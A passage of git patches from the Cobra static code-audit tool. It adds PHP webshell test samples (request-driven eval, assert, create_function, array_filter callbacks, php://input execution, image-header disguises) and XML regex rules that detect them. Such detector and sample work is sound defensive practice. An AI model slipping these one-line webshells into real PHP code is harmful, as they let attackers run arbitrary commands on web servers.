$_REQUEST['e'];$arr = array($_POST['pass'],);array_filter($arr, base64_decode($e)); +$e = $_REQUEST['e']; +$arr = array($_POST['pass'],); +array_filter($arr, base64_decode($e)); //cvi-360011 换行就挂 -$newfunc = create_function(null,'assert($_POST[c]);');$newfunc(); +$newfunc = create_function(null,'assert($cmd);');$newfunc(); //cvi-360012 换行就挂 -$newfunc = create_function('str','return str');$newfunc("$_POST['c']"); +$newfunc = create_function('str','return str'); +$newfunc("$_POST['c']"); + +//cvi-360013 换行就挂的那种 +$fun = $_POST['fun'];$ newfunc = create_function('str',$fun); + +//cvi-360014 换行就挂的那种 +$a=$_GET['A'];$a($_GET['B']); + +//cvi-360015 +if ($dbhandle = sqlite_open('mysqlitedb', 0666, $sqliteerror)) { + sqlite_create_function($dbhandle, 'func', 'eval($cmd);', 1); +} else { + echo 'Error opening sqlite db: ' . $sqliteerror; + exit; +} + +//cvi-360016 +$string = "hello cobra"; +filter_var($string, FILTER_CALLBACK,eval($cmd)); + +//cvi-360017 换行挂 +$string = "hello cobra"; +$func=$_POST['func'];filter_var($string, FILTER_CALLBACK,$func); + +//cvi-360018??????? +$data = mb_ereg_replace("[^A-Za-z0-9\.\-]","$_POST['replacement']",$data); + + +//cvi-360019??????? +$replacement=$_POST['replacement'];$data = mb_ereg_replace("[^A-Za-z0-9\.\-]",$replacement,$data); + + +//cvi-360020 +array_walk($array,$_POST['func']); + +//cvi-360021 换行挂 +$func=$_POST['func'];array_walk($array,$func); + +//cvi-360022 +eval(file_get_contents("php://input")) + +//cvi-360023 特征值 +GIF87a<?php +BM<?php + +//cvi-360024 +$f=$c('',$d);$f(); + +//cvi-360025 +$a=str_replace($bb=$cc);$a();$bb(); +$a=str_replace("$cc=$dd","Shanghai","Hello world!");$a();$cc(); + +//cvi-360026 +ob_start("eval($cmd)"); + +//cvi-360027 +eval(php://input); + +//cvi-360028 特征值 +eval("?>". +cat /etc/passwd + +//cvi-360029 特征值 +$bind_pl="IyEvdXNyL2Jpbi9lbnYgcGV"; + +//cvi-360030 特征值 +$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU2 + +//cvi-360031 特征值 +if(file_exists($settings['STOPFILE'])){$a="hello"} + +//cvi-360032 特征值 +b374k; +c999shexit(); + +//cvi-360033 特征值 +$OOO000000=urldecode; +1MSSYowqjzlVVAwAoHHFXzQ5Lc; + +//cvi-360034 360014 +$a=$_GET['A']; $a($_GET['B']); ?> From e3b3d0876f0083b7457171ee170a59fcae49a62b Mon Sep 17 00:00:00 2001 From: braveghz <braveghz@gmail.com> Date: Mon, 4 Sep 2017 19:07:41 +0800 Subject: [PATCH 13/29] tmp-version --- cobra/parser.py | 2 ++ rules/CVI-165001.xml | 8 ++++---- rules/CVI-250001.xml | 24 ------------------------ rules/CVI-360005.xml | 4 +--- rules/CVI-360010.xml | 21 +++++++++++++++++++++ rules/CVI-360013.xml | 21 +++++++++++++++++++++ rules/CVI-360014.xml | 21 +++++++++++++++++++++ rules/CVI-360015.xml | 21 +++++++++++++++++++++ rules/CVI-360016.xml | 21 +++++++++++++++++++++ rules/CVI-360017.xml | 21 +++++++++++++++++++++ rules/CVI-360018.xml | 21 +++++++++++++++++++++ rules/CVI-360019.xml | 21 +++++++++++++++++++++ rules/CVI-360020.xml | 21 +++++++++++++++++++++ rules/CVI-360021.xml | 21 +++++++++++++++++++++ rules/CVI-360022.xml | 21 +++++++++++++++++++++ rules/CVI-360023.xml | 21 +++++++++++++++++++++ rules/CVI-360024.xml | 21 +++++++++++++++++++++ rules/CVI-360025.xml | 21 +++++++++++++++++++++ rules/CVI-360026.xml | 21 +++++++++++++++++++++ rules/CVI-360027.xml | 21 +++++++++++++++++++++ rules/CVI-360028.xml | 21 +++++++++++++++++++++ rules/CVI-360029.xml | 20 ++++++++++++++++++++ rules/CVI-360030.xml | 20 ++++++++++++++++++++ rules/CVI-360031.xml | 20 ++++++++++++++++++++ rules/CVI-360034.xml | 2 +- rules/CVI-360035.xml | 21 +++++++++++++++++++++ rules/CVI-360036.xml | 21 +++++++++++++++++++++ rules/CVI-360037.xml | 21 +++++++++++++++++++++ rules/CVI-360038.xml | 21 +++++++++++++++++++++ rules/CVI-360039.xml | 21 +++++++++++++++++++++ rules/CVI-360040.xml | 21 +++++++++++++++++++++ rules/CVI-360041.xml | 21 +++++++++++++++++++++ rules/CVI-360042.xml | 21 +++++++++++++++++++++ rules/CVI-360043.xml | 21 +++++++++++++++++++++ rules/CVI-360044.xml | 21 +++++++++++++++++++++ rules/CVI-360045.xml | 21 +++++++++++++++++++++ rules/CVI-360046.xml | 21 +++++++++++++++++++++ rules/CVI-360047.xml | 21 +++++++++++++++++++++ rules/CVI-360048.xml | 21 +++++++++++++++++++++ rules/CVI-360049.xml | 21 +++++++++++++++++++++ rules/CVI-360050.xml | 21 +++++++++++++++++++++ rules/CVI-360051.xml | 21 +++++++++++++++++++++ rules/CVI-360052.xml | 21 +++++++++++++++++++++ 43 files changed, 803 insertions(+), 32 deletions(-) delete mode 100644 rules/CVI-250001.xml diff --git a/cobra/parser.py b/cobra/parser.py index 67b9e9f3..c72d11a8 100644 --- a/cobra/parser.py +++ b/cobra/parser.py @@ -664,5 +664,7 @@ def scan_parser(code_content, sensitive_func, vul_lineno): analysis(all_nodes, func, back_node, int(vul_lineno), flag=0, function_params=None) except SyntaxError as e: logger.debug(e) + except Exception as e: + logger.debug(e) return scan_results diff --git a/rules/CVI-165001.xml b/rules/CVI-165001.xml index 70cfa449..6b8b4512 100644 --- a/rules/CVI-165001.xml +++ b/rules/CVI-165001.xml @@ -7,10 +7,10 @@ <level value="5"/> <test> <case assert="true"><![CDATA[ - $surname=$_GET['surname']; - $filter = "(sn=" . $surname . ")"; - $sr=ldap_search($ds, "o=My Company, c=US", $filter); - $info = ldap_get_entries($ds, $sr); + $surname=$_GET['surname']; + $filter = "(sn=" . $surname . ")"; + $sr=ldap_search($ds, "o=My Company, c=US", $filter); + $info = ldap_get_entries($ds, $sr); ]]></case> </test> <solution> diff --git a/rules/CVI-250001.xml b/rules/CVI-250001.xml deleted file mode 100644 index 73530215..00000000 --- a/rules/CVI-250001.xml +++ /dev/null @@ -1,24 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="LDAP注入"/> - <language value="php"/> - <match mode="function-param-controllable"><![CDATA[ldap_(add|delete|list|read|search|bind)]]></match> - <repair block="in-function-up"><![CDATA[ldap_escape\s*\(\s*.+?\s*,\s*.+?\s*,\s*LDAP_ESCAPE_FILTER\s*\)]]></repair> - <level value="5"/> - <test> - </test> - <solution> - ## 安全风险 - - LDAP Injection - 允许进行LDAP查询 + 输入未进行过滤 ---> LDAP注入 - 这种威胁可以让攻击者能够从LADP树中提取到很多很重要的信息 - - ## 修复方案 - 对用户输入数据中包含的”语言本身的保留字符”进行转义 - - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> - diff --git a/rules/CVI-360005.xml b/rules/CVI-360005.xml index 86cfbbe3..45ef2e8e 100644 --- a/rules/CVI-360005.xml +++ b/rules/CVI-360005.xml @@ -2,9 +2,7 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="webshell5"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - \$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|[^;]*chr[\s\(]*(101|0x65|0145|\\d+)|['\"](/[^/]*/|\|[^\|]*\||\'[^']*')\w{0,5}e\w{0,5}['\"])[\s\S]{0,1000}(preg_replace|preg_filter)[/*\s]*\([/*\s]*\$\s*\1.{0,30}(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec) - ]]></match> + <match mode="regex-only-match"><![CDATA[\$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|[^;]*chr[\s\(]*(101|0x65|0145|\d+)|['\"](/[^/]*/|\|[^\|]*\||\'[^']*')\w{0,5}e\w{0,5}['\"])[\s\S]{0,1000}(preg_replace|preg_filter)[/*\s]*\([/*\s]*\$\s*\1.{0,30}(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)]]></match> <level value="7"/> <test> </test> diff --git a/rules/CVI-360010.xml b/rules/CVI-360010.xml index e69de29b..6bbfb48a 100644 --- a/rules/CVI-360010.xml +++ b/rules/CVI-360010.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell10"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + \$\s*(\w+)\s*=[\s\(\{]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|['\"]\\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|[^,;]*?\\x|[^,;]*?['\"]\s*\.\s*['\"]))[\s\S]{0,1000}((array_filter|array_reduce|array_diff_ukey|array_udiff|array_walk|uasort|uksort|usort|new\s*SQLite3[\s\S]*->\s*createFunction)\s*\(+[^,]*\$[^,]*|PDO::FETCH_FUNC\s*),\s*(\$\s*\1\s*\)|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*\$\s*\1)) + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[$e = $_REQUEST['e'];$arr = array($_POST['pass'],);array_filter($arr, base64_decode($e));]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360013.xml b/rules/CVI-360013.xml index e69de29b..a8c0f7e6 100644 --- a/rules/CVI-360013.xml +++ b/rules/CVI-360013.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell13"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + \$\s*(\w+)\s*=[\s\(\{]*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*.{0,100}(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec).{1,100}\s*['\"]|file_get_contents)[\s\S]{0,200}create_function\s*\(+[^,]{1,100},['\"\s]*(\$\s*\1['\"\s]*\)|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*\$\s*\1)) + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360014.xml b/rules/CVI-360014.xml index e69de29b..fa367b59 100644 --- a/rules/CVI-360014.xml +++ b/rules/CVI-360014.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell14"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + \$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\s*['\"]|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)\s*\()[\s\S]{0,200}\s*\$\1\s*\(+[^\)]*(\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25}) + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360015.xml b/rules/CVI-360015.xml index e69de29b..44633e23 100644 --- a/rules/CVI-360015.xml +++ b/rules/CVI-360015.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell15"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + sqlite_create_function\s*\([\s\S]{0,200}(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)|(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)[\s\S]{0,200}sqlite_create_function\s*\( + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360016.xml b/rules/CVI-360016.xml index e69de29b..c6908308 100644 --- a/rules/CVI-360016.xml +++ b/rules/CVI-360016.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell16"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + \b(filter_var|filter_var_array)\b\s*\(.*FILTER_CALLBACK[^;]*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)) + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360017.xml b/rules/CVI-360017.xml index e69de29b..4b6e320d 100644 --- a/rules/CVI-360017.xml +++ b/rules/CVI-360017.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell17"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + \$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\s*['\"]|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)\s*\()[\s\S]{0,200}\b(filter_var|filter_var_array)\b\s*\(.*FILTER_CALLBACK[^;]*\$\1 + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360018.xml b/rules/CVI-360018.xml index e69de29b..d4cd189f 100644 --- a/rules/CVI-360018.xml +++ b/rules/CVI-360018.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell18"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + \b(mb_ereg_replace|mb_eregi_replace)\b\s*\((.*,){3}\s*(['\"][^,\"'\)]*e[^,\"'\)]*['\"]|.*(\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25}).*|chr\s*\(\s*101|chr\s*\(\s*0x65|chr\s*\(\s*0145)\s*\) + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360019.xml b/rules/CVI-360019.xml index e69de29b..e89fb879 100644 --- a/rules/CVI-360019.xml +++ b/rules/CVI-360019.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell19"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + \$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{3,25})|['\"][^;]*e|[^;]*chr[\s\(]*(101|0x65|0145))[\s\S]{0,200}\b(mb_ereg_replace|mb_eregi_replace)\b\s*\((.*,){3}\s*\$\1 + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360020.xml b/rules/CVI-360020.xml index e69de29b..bb9d571f 100644 --- a/rules/CVI-360020.xml +++ b/rules/CVI-360020.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell20"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + array_walk(_recursive)?\s*\([^;,]*,\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|preg_replace)\s*['\"]|(\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})) + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360021.xml b/rules/CVI-360021.xml index e69de29b..216fafde 100644 --- a/rules/CVI-360021.xml +++ b/rules/CVI-360021.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell21"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + \$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|preg_replace))[\s\S]{0,200}array_walk(_recursive)?\s*\([^;,]*,\s*(\$\s*\1|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*\$\s*\1)) + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360022.xml b/rules/CVI-360022.xml index e69de29b..cba0ee2d 100644 --- a/rules/CVI-360022.xml +++ b/rules/CVI-360022.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell22"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + \b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|include)(\b\s)*\(\s*(file_get_contents\s*\(\s*)?['\"]php://input + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360023.xml b/rules/CVI-360023.xml index e69de29b..4ae30c28 100644 --- a/rules/CVI-360023.xml +++ b/rules/CVI-360023.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell23"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + ^(\xff\xd8|\x89\x50|GIF89a|GIF87a|BM|\x00\x00\x01\x00\x01)[\s\S]*<\?\s*php + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360024.xml b/rules/CVI-360024.xml index e69de29b..bc678fdc 100644 --- a/rules/CVI-360024.xml +++ b/rules/CVI-360024.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell24"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + \$(\w)=\$[a-zA-Z]\('',\$\w\);\$\1\(\); + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360025.xml b/rules/CVI-360025.xml index e69de29b..57d67a92 100644 --- a/rules/CVI-360025.xml +++ b/rules/CVI-360025.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell25"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + \$(\w+)\s*=\s*str_replace\s*\([\s\S]*\$(\w+)\s*=\s*\$(\w+)(([\s\S]{0,255})|(\s*\(\'\',\s*(\$(\w+)\s*\(\s*)+))\$\1\s*\([\s\S]{0,100};?\s*\$\2\(?\s*\) + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360026.xml b/rules/CVI-360026.xml index e69de29b..e1abf535 100644 --- a/rules/CVI-360026.xml +++ b/rules/CVI-360026.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell26"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + ob_start\s*\(+\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec).{0,20}|['\"]\s*\w+[\s\S]{1,50}phpinfo\s*\(\s*\)) + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360027.xml b/rules/CVI-360027.xml index e69de29b..df73e949 100644 --- a/rules/CVI-360027.xml +++ b/rules/CVI-360027.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell27"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + \b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\b\s*\(((\$_SERVER|\$_ENV|getenv|\$GLOBALS)\s*[\[\(]\s*['\"]+(REQUEST_URI|QUERY_STRING|HTTP_[\w_]+|REMOTE_[\w_])['\"\s]+\s*[\]\)]|php://input|exif_read_data\s*\() + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360028.xml b/rules/CVI-360028.xml index e69de29b..76131cdf 100644 --- a/rules/CVI-360028.xml +++ b/rules/CVI-360028.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell28"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + eval\(\"\?>\"\.|gzinflate\(base64_decode\(|eval\(base64_decode\(|cat\s*/etc/passwd|Safe_Mode\s*Bypass + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360029.xml b/rules/CVI-360029.xml index e69de29b..f6f8467e 100644 --- a/rules/CVI-360029.xml +++ b/rules/CVI-360029.xml @@ -0,0 +1,20 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell29"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + \$_\[\$_|\${\"_P\"\.|a(.)s\1s\1e\1r\1t|'e'\.'v'\.'a'\.'l|687474703a2f2f626c616b696e2e64756170702e636f6d2f7631|python_eval\(\"import os\\nos.system\(|\$bind_pl\s*=\s*\"IyEvdXNyL2Jpbi9lbnYgcGV|phpsocks5_encrypt\s*\(|eNrs/Vmv41iWJgq+ZwH1H7wdAWRksypJihRF3kQ0mvMsihTnuoUA53meeVG/valj5mbuHpF9b6P7se + ]]></match> + <level value="7"/> + <test> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360030.xml b/rules/CVI-360030.xml index e69de29b..3d44e938 100644 --- a/rules/CVI-360030.xml +++ b/rules/CVI-360030.xml @@ -0,0 +1,20 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell30"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + preg_replace\s*\(\s*['\"][^;]*e[^;]*['\"],([^;]{0,30}\\x|[^;\)]{200,300})|\$back_connect=\"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU2|define\('gzip',function_exists\(\"ob_gzhandler\"\)|chr\(112\)\.chr\(97\)\.chr\(115\)\.chr\(115\)|687474703a2f2f377368656c + ]]></match> + <level value="7"/> + <test> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360031.xml b/rules/CVI-360031.xml index e69de29b..87d64654 100644 --- a/rules/CVI-360031.xml +++ b/rules/CVI-360031.xml @@ -0,0 +1,20 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell31"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + ini_get\s*\(\s*\"disable_functions\"\s*\)|\d\s*=>\s*array\s*\(\s*['\"]\s*pipe\s*['\"]|gzuncompress\(base64_decode\(|crypt\(\$_SERVER\['HTTP_H0ST'\],\d+\)==|if\(file_exists\(\$settings\['STOPFILE'\]\)\) + ]]></match> + <level value="7"/> + <test> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360034.xml b/rules/CVI-360034.xml index 73732db8..76ee617f 100644 --- a/rules/CVI-360034.xml +++ b/rules/CVI-360034.xml @@ -1,6 +1,6 @@ <?xml version="1.0" encoding="UTF-8"?> <cobra document="https://github.com/wufeifei/cobra"> - <name value="webshell12"/> + <name value="webshell34"/> <language value="php"/> <match mode="regex-only-match"><![CDATA[ \$(\w+)[\s]*\=[\s]*\$_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}[\s\S]*\$(?:\1\(\s*\$_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}\s*\)|(\w+)\s*\=\s*\$_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}[\s\S]*\$(\1\(\s*\$\2|\2\(\s*\$\1)\s*\)|_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}\(\s*\$\1\s*\))|\$_(?:POST|GET|REQUEST|COOKIE|SERVER)\[(['\"]\w+['\"]|\d+)\]\(\s*\$_(?:POST|GET|REQUEST|COOKIE|SERVER)\[(['\"]\w+['\"]|\d+)\]\s*\) diff --git a/rules/CVI-360035.xml b/rules/CVI-360035.xml index e69de29b..793f69f4 100644 --- a/rules/CVI-360035.xml +++ b/rules/CVI-360035.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="str_pattern"/> + <language value="jsp"/> + <match mode="regex-only-match"><![CDATA[ + \bJFolder|\bwebshell|\bvonloesch\.de|reDuh\.jsp|QQ:179189585|JSP\s*文件管理器|\bJSPSpy|\bKJ021320 + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360036.xml b/rules/CVI-360036.xml index e69de29b..eac29429 100644 --- a/rules/CVI-360036.xml +++ b/rules/CVI-360036.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="exec_cmd"/> + <language value="jsp"/> + <match mode="regex-only-match"><![CDATA[ + (?:(?:java\.lang\.)?Runtime)?\s*(\w+)\s*=\s*(?:java\.lang\.)?Runtime\.getRuntime\(\)[\s\S]*\1\.exec\(.*?\) + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file 